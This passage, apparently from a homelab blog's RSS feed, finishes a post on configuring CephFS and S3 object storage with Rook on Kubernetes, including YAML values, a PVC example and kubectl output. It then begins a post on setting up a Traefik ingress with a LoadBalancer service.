size &ldquo;2&rdquo;. This way I have redundancy, including for whole-host failures via the
<code>failureDomain: host</code> setting. This forces Ceph to store both replicas of an
object on two different hosts. I&rsquo;m also giving a <code>min_size: &quot;1&quot;</code>. This tells
Ceph to continue operating as normal even when one of the two replicas is gone.
That&rsquo;s a little bit unsafe, but ensures that my systems continue running, even
when the host with the other replica goes down, for maintenance or through
sheer stupidity on my side. &#x1f605;</p>
<p>Then there&rsquo;s the storage class. I&rsquo;ve got the <code>isDefault</code> option disabled for
all of my storage classes, so that I always have to explicitly chose one. I&rsquo;m
just wired in such a way that I prefer explicit values to defaults. &#x1f937;
The <code>reclaimPolicy</code> is a <strong>very</strong> important option. It determines what happens
when a Kubernetes <a href="https://kubernetes.io/docs/concepts/storage/persistent-volumes/">persistent volume</a>
is removed. With the setting <code>Retain</code>, the underlying Ceph volume is retained
and needs to be removed separately. As I&rsquo;m still a bit unfamiliar with k8s,
I find it prudent to set <code>Retain</code> on all of my storage classes. &#x1f605;</p>
<p>Next, the <code>allowVolumeExpansion</code> option does what it says: It allows existing
volumes to be enlarged. The <code>volumeBindingMode</code> option defines when the volume
is created. With the <code>Immediate</code> value, the Ceph volume will be created when
the PVC is deployed in the cluster. With the <code>WaitForFirstCustomer</code> value,
the Ceph volume would only be created once the first pod using it is created.</p>
<p>Then there&rsquo;s the parameters. Most of them are simply defaults I copied over from
the example <code>values.yaml</code> file. The important one is the <code>imageFeatures</code> setting.
It contains a list of options for newly created Ceph RBDs.
Details on these options can be found <a href="https://docs.ceph.com/en/latest/man/8/rbd/#cmdoption-rbd-image-feature">here</a>.</p>
<h2 id="cephfs">CephFS</h2>
<p>Next comes the CephFS pool and storage class. <a href="https://docs.ceph.com/en/latest/cephfs/">CephFS</a>
is a POSIX-compliant file system. It can be mounted on any Linux machine and
supports permissions and ACLs. It is a bit more complex than RBDs as a consequence,
as all the file metadata needs to be handled. For that reason, it needs an
additional set of daemons, the MDS (Metadata Server). It allows concurrent access,
and that&rsquo;s what I&rsquo;m mostly using it for in my setup. I&rsquo;m using it to share the
volume with my Linux ISOs between my Linux ISO media server and my desktop, for example.
I&rsquo;m also using it for cases where multiple Nomad jobs need to access the same
volume, RWX volumes in CSI parlance. It will serve the same purpose in my
k8s cluster.</p>
<p>As it allows concurrent access and hence suffers from the cost of networked
coordination, I&rsquo;m only having a single pool for it, located on my HDDs, as I
don&rsquo;t expect access to it to need to be fast anyway.</p>
<p>Here&rsquo;s the definition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephFileSystems</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadataPool</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dataPools</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bulk</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">preserveFilesystemOnDelete</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadataServer</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">activeCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">activeStandby</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;250m&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">priorityClassName</span>: <span style="color:#ae81ff">system-cluster-critical</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                        - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pool</span>: <span style="color:#ae81ff">bulk</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowVolumeExpansion</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeBindingMode</span>: <span style="color:#e6db74">&#34;Immediate&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/fstype</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-node</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span></code></pre></div><p>In contrast to RBDs, I&rsquo;m needing two pools, one for metadata and one for the
actual data. The setup of the two pools is similar to the RBD pool, replication
of &ldquo;2&rdquo;, with <code>host</code> as the failure domain. I&rsquo;m also again setting it up so
that a deletion of the file system CRD does not lead to a deletion of the
file system in Ceph. Just to protect myself from my own stupidity, with the
<code>preserveFilesystemOnDelete</code> option.
I also need to set up the MDS deployment here, which I do the same way as the
other Ceph daemons. Meaning with a toleration of the Ceph taint and an affinity
for my Ceph nodes.</p>
<p>The storage class is pretty much the same as before, with the addition of the
<code>pool</code> option, which denotes the data pool to be used.</p>
<h2 id="rgwss3">RGWs/S3</h2>
<p>Finally, S3. I&rsquo;m using it wherever I need a &ldquo;data lake&rdquo; type storage. It doesn&rsquo;t
have volumes, it doesn&rsquo;t need to be mounted, I can just push data into it with
a variety of tools until my physical disks are full. I found Ceph&rsquo;s S3 to be
pretty well supported and have yet to meet any application that wants S3 storage
but won&rsquo;t work with Ceph. The only thing one might have to do is to make sure
that the <code>path-based</code> option is enabled, as by default, S3 buckets are to be
addressed via DNS, not via a URL.
I&rsquo;m using S3 for a variety of applications, ranging from Nextcloud to restic
backups.</p>
<p>Similar to CephFS, S3 requires additional daemons, the Rados Gateway (RGW).
I have diverted a bit from my current setup here. In my baremetal cluster,
Consul agents are running on the Ceph hosts, announcing a service for my S3
storage. Then, the RGWs receive my Let&rsquo;s Encrypt cert and get accessed directly
from the outside, and via the Consul Connect mesh network from services in my
Nomad cluster.
For now, I decided to keep the RGWs for Rook internal and only accessible through
my ingress, to simplify my setup a bit. I will have to see how well that
performs, for example during backups.</p>
<p>Here is the definition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephObjectStores</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadataPool</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dataPool</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">preservePoolsOnDelete</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">gateway</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">hostNetwork</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">preferredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">weight</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">preference</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                        - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;500m&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;512Mi&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeBindingMode</span>: <span style="color:#e6db74">&#34;Immediate&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">host</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span></code></pre></div><p>First on the agenda is, again, the pool setup. Like CephFS, RGWs need metadata
and data pools. They will even create additional pools for indexes and such.
Same strategy as before, metadata on SSDs, data on HDDs and replication factor
of &ldquo;2&rdquo;.
And also similar to the other two storage types, I&rsquo;m preserving pools on deletion,
meaning when the pools CRD manifest is removed, the Ceph pool is kept until it
is deleted manually.</p>
<p>Then the setup for the RGW daemons themselves. Again, very similar to before.
Two instances, and tolerations and affinity for my Ceph nodes to allow them to
run there.</p>
<p>The storage class is again nothing special. The ingress is also pretty standard.
Going through my proxy via the HTTPS entrypoint, and being hosted at <code>s3.example.com</code>.
I might add a <code>LoadBalancer</code> service here if I find that I don&rsquo;t like the perf
of putting all cluster-external S3 traffic through the ingress.</p>
<p>And that&rsquo;s it. With all of these deployed, the operator will create the necessary
pods and pools as well as storage classes, and we&rsquo;re ready to make use of it.
At this point I haven&rsquo;t actually used the cluster yet, but I just figured that
I should provide at least some examples.</p>
<p>So let&rsquo;s see whether this entire setup actually works. &#x1f605;</p>
<h1 id="examples">Examples</h1>
<p>If you&rsquo;ve made it through the 22 minutes of reading time Hugo currently shows,
you probably already know how storage in k8s works, so I will be brief. For
storage management, k8s has the <a href="https://github.com/container-storage-interface/spec/blob/master/spec.md">CSI</a>.
A spec on how a workload scheduler will communicate with a storage provider to
get volumes. In k8s, the story of a storage volume begins with a persistent
volume claim (<a href="https://kubernetes.io/docs/concepts/storage/persistent-volumes/">PVC</a>).</p>
<p>For my specific Ceph Rook setup, that might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-claim</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">tests</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/usage</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">2Gi</span>
</span></span></code></pre></div><p>This will create a persistent volume of size 2 GB, with the <code>rbd-fast</code> class,
meaning Ceph will create the volume on my SSD pool.</p>
<p>This took quite a while to provision, about 7 minutes. I&rsquo;m pretty sure that&rsquo;s
not normal, but this post is already long enough, so I will investigate that
later. &#x1f609;</p>
<p>In the end, this produces a persistent volume claim like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n tests pvc
</span></span><span style="display:flex;"><span>AME         STATUS   VOLUME                                     CAPACITY   ACCESS MODES   STORAGECLASS   AGE
</span></span><span style="display:flex;"><span>test-claim   Bound    pvc-cb5e3aaa-1292-4bbc-9a9e-309be90ee30d   2Gi        RWO            rbd-fast       7m49s
</span></span></code></pre></div><p>The volume itself can also be shown:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>k -n tests get pv
</span></span><span style="display:flex;"><span>NAME                                       CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS   CLAIM              STORAGECLASS   REASON   AGE
</span></span><span style="display:flex;"><span>pvc-cb5e3aaa-1292-4bbc-9a9e-309be90ee30d   2Gi        RWO            Retain           Bound    tests/test-claim   rbd-fast                7m49s
</span></span></code></pre></div><p>An important piece of information is also shown in the volume&rsquo;s <code>describe</code> output:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>Source:
</span></span><span style="display:flex;"><span>    Type:              CSI <span style="color:#f92672">(</span>a Container Storage Interface <span style="color:#f92672">(</span>CSI<span style="color:#f92672">)</span> volume source<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    Driver:            rook-ceph.rbd.csi.ceph.com
</span></span><span style="display:flex;"><span>    FSType:            ext4
</span></span><span style="display:flex;"><span>    VolumeHandle:      0001-000c-rook-cluster-0000000000000002-b4e37061-2df1-4a15-8a8d-93f3854cecbb
</span></span><span style="display:flex;"><span>    ReadOnly:          false
</span></span><span style="display:flex;"><span>    VolumeAttributes:      clusterID<span style="color:#f92672">=</span>rook-cluster
</span></span><span style="display:flex;"><span>                           imageFeatures<span style="color:#f92672">=</span>layering,exclusive-lock,object-map,fast-diff
</span></span><span style="display:flex;"><span>                           imageName<span style="color:#f92672">=</span>csi-vol-b4e37061-2df1-4a15-8a8d-93f3854cecbb
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>The interesting thing is the <code>imageName</code>, because that&rsquo;s the name of the RBD
volume in the Ceph cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rook-ceph rbd ls --long --pool rbd-fast
</span></span><span style="display:flex;"><span>NAME                                          SIZE   PARENT  FMT  PROT  LOCK
</span></span><span style="display:flex;"><span>csi-vol-b4e37061-2df1-4a15-8a8d-93f3854cecbb  <span style="color:#ae81ff">2</span> GiB            <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>I will leave it at this for the time being. The CephFS based volume will be
pretty similar, and the next thing I will do for the migration is to migrate my
S3 buckets over to Rook from the baremetal cluster, so S3 buckets will get their
very own article.</p>
<h1 id="kubectl-plugin">kubectl plugin</h1>
<p>Before I finish this, I would like to point you to the excellent <code>kubectl</code> plugin
for Rook. It can be found <a href="https://github.com/rook/kubectl-rook-ceph">here</a>.</p>
<p>It provides an easy to use interface to the Rook Ceph cluster, without having
to configure admin credentials on the machine you would like to use. The
kubectl certs are enough.
With it, I can access the full <code>ceph</code> CLI, as well as other tools, like <code>rbd</code>.</p>
<p>The main advantage for me is that I won&rsquo;t have to set up aliases for the
two Ceph clusters I&rsquo;m managing from the same machine. No danger of fat-fingering
the wrong cluster. &#x1f389;</p>
<h1 id="conclusion">Conclusion</h1>
<p>Phew. Congrats to the both of us, dear reader, for getting through this. &#x1f605;
Overall, I liked the experience of setting up Rook. Especially the aspect that
I can now configure at least some aspects of my Ceph cluster declaratively,
putting it under version control.</p>
<p>One question I&rsquo;ve been wondering about: How would this have gone if this Rook
setup was my first contact with Ceph? Would it have been equally easy and clear?</p>
<p>I&rsquo;m honestly not sure. As I&rsquo;ve noted in the intro, I find my Ceph cluster
surprisingly low maintenance, but this setup has again shown me how many moving
parts there are. At least from my PoV, Rook does a good job abstracting a lot of
that.</p>
<p>But I&rsquo;m not sure how comfortable I would have been with these abstractions if
I hadn&rsquo;t run a Ceph cluster for almost three years now.</p>
<h1 id="update-on-2024-01-21">Update on 2024-01-21</h1>
<p>A short update on this article: The setup as described here leads to the
PG autoscaler not working. If that is something you need, I&rsquo;ve written a
follow-up article with a fix <a href="https://blog.mei-home.net/posts/ceph-rook-crush-rules/">here</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 3: Ingress with Traefik</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/</link>
      <pubDate>Sat, 06 Jan 2024 02:00:43 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/</guid>
      <description>Setting up my k8s cluster ingress with Traefik</description>
      <content:encoded><![CDATA[<p>Wherein I talk about the Ingress setup for my Homelab&rsquo;s k8s cluster with Traefik.</p>
<p>This is part four of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>After the initial setup of some infrastructure like <code>external-dns</code> and <code>external-secrets</code>,
I went to work on the <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">Ingress</a>
implementation for my cluster.</p>
<p>I chose <a href="https://traefik.io/traefik/">Traefik</a> as my Ingress controller. This
was mostly driven by the fact that I&rsquo;m already using Traefik as the proxy in
front of my current Nomad cluster, and I&rsquo;ve become quite familiar with it.</p>
<p>One big advantage of Traefik is the extensive support for a wide array of
what they call <a href="https://doc.traefik.io/traefik/providers/overview/">Configuration Providers</a>.
In my current Nomad setup, I&rsquo;m making use of the Consul provider. In comparison
to software like Nginx or Apache, I can configure all proxy related config
in the <a href="https://developer.hashicorp.com/nomad/docs/job-specification/service">service block</a>
of my Nomad jobs, as labels on the Consul service definition. This allows for
centralization of the entire config related to a specific service, instead of
having two places: The config for the service&rsquo;s deployment, and the proxy config.</p>
<h1 id="networking-options">Networking options</h1>
<p>While planning my k8s cluster, I considered two different ways of doing
networking for the Ingress. The first one is to simply have the proxy using the
host&rsquo;s networking. This is the setup that I&rsquo;m currently working with in my
Nomad setup. I&rsquo;ve got the Traefik job pegged to a single host, and then I&rsquo;ve got
a hard-coded <code>A</code> entry in my DNS pointing to that machine. Traefik then listens on
port 443 and so forth. Then I&rsquo;m adding <code>CNAME</code> entries to DNS for other services
running through that proxy.</p>
<p>I set Traefik up the same way during my k8s experiments. But this has one large
downside: High availability. If the ingress host goes down, not only is Traefik
down, but also all services served through it. That doesn&rsquo;t bother me too much,
but with k8s, I had a different option: <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">Services of type LoadBalancer</a>.
This has the advantage that I no longer have to restrict Traefik to a specific
host to get a stable IP to point all the DNS entries at. Instead, the stable
IP is now supplied by Cilium, which also announces routes to those IPs to my
router.</p>
<p>The one downside of the <code>LoadBalancer</code> approach is that source IPs are not
necessarily preserved. This makes functionality like IP allow lists in Traefik
pretty useless.
The fix for this is to use <code>externalTrafficPolicy: Local</code> on the Service. This
config ensures that Cilium announces only the IPs of the hosts which currently
run a Traefik pod, and then the cluster-internal, source NAT&rsquo;ed routing does not
apply, and source IPs are preserved.</p>
<h1 id="deployment">Deployment</h1>
<p>I&rsquo;m using the <a href="https://github.com/traefik/traefik-helm-chart">official Helm chart</a>
for my deployment. Currently, I&rsquo;m only running a single replica, but that might
change in the future.</p>
<p>I will go through my <code>values.yaml</code> file piece-by-piece, to make the explanation
a bit more manageable.</p>
<p>Let&rsquo;s start with the values for the Deployment itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">deployment</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">healthchecksPort</span>: <span style="color:#ae81ff">4435</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">additionalArguments</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;--ping.entryPoint=health&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;--providers.kubernetesingress.ingressendpoint.hostname=ingress-k8s.mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">logs</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">general</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">level</span>: <span style="color:#ae81ff">DEBUG</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">format</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">access</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">format</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheus</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;250m&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;250M&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m not changing very much about the deployment, safe for setting a specific
